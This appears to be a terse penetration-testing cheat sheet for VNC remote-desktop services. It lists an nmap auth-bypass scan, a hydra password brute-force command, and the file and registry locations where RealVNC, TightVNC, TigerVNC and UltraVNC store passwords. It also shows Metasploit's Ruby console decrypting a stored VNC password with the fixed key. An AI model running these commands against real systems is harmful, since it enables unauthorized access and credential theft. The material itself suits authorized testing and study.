nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -v -p <PORT> <IP>
hydra -L <USERS_LIST> –P <PASSWORDS_LIST> -s <PORT> <IP> vnc -u -vV
Default password is stored in: ~/.vnc/passwd
# RealVNC
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver
# TightVNC
HKEY_CURRENT_USER\Software\TightVNC\Server
# TigerVNC
HKEY_LOCAL_USER\Software\TigerVNC\WinVNC4
# UltraVNC
C:\Program Files\UltraVNC\ultravnc.ini
msfconsole
irb
fixedkey = "\x17\x52\x6b\x06\x23\x4e\x58\x07"
require 'rex/proto/rfb'
Rex::Proto::RFB::Cipher.decrypt ["2151D3722874AD0C"].pack('H*'), fixedkey
/dev/nul
echo MYVNCPASSWORD | vncpasswd -f > ~/.secret/passvnc
Warning: password truncated to the length of 8.
cat ~/.secret/passvnc
kRS�ۭx8
vncviewer hostname-of-vnc-server -passwd ~/.secret/passvnc